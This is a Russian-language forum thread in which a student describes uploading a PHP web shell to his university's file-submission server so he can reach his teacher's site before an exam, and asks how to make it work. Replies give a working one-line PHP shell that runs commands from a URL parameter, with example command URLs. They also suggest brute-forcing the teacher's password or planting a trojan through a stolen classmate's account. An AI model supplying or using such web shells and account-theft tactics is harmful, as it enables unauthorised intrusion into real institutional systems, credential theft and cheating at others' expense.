|
Сайт университета
Учитель имеет сайт на серваке университета. У каждого ученика на сайте университета (не учителя) свой экяунт.
Через этот экяунт мы можем повылать ЛЮБЫЕ файлы учителю. Но когда посылаешь файл то учитель видет от кого он пришел. Также можно хранить на сервере файлы. Я пробовал залить на сервер файл r57shell.php - он его не берет, видимо потамучто файл много занимет. Также пробовал залить самодельный шелл shell.php в нем: <? system($_GET[c]); ?> Он его взял залил в ../upload/_3456/shell.php мне на моем экяунте показал ссылку этого файла. Я кликаю на ссылку то мне на белом окне вылетает <? system($_GET[c]); ?> Причем когда копируешь эту ссылку файла в буфер потом встовзяешь в internet explorer то те пишут ACCESS Denied. "Назад к учителю" У него сайт простой из html никаких скриптов. Мой вопрос у кого есть какие идеи чтоб туда шелл залить. Просто экламен через ниделю. Извините но полный адрес сайта учителя дать не могу. Да ща только что пробывал залить эту вышеперечисленую шеллу на другой провереный сервак то просто выпадает пустой скрин. Зарание спасибо. |
дык наверное надо его юзать так
http://www.xxx.com/shell.php?c=id или http://www.xxx.com/shell.php&c=id ) |
Ты уверен что на серваке есть поддержка Php?
|
а по твоему ) как оно тогда залило?)
|
Через html можно тоже заливать.
|
Цитата:
|
попробуй брутом пас угнать или трояном который можно впарить преподу и не со своего аккаунта. как вариант с забрученого аккаунта своего врага...
|
Попробуй вот так:
<?php system($_GET['c']); ?> Пример использования (для винды) => xttp://site/shell.php?c=dir |
Цитата:
|
Цитата:
|
| Время: 04:08 |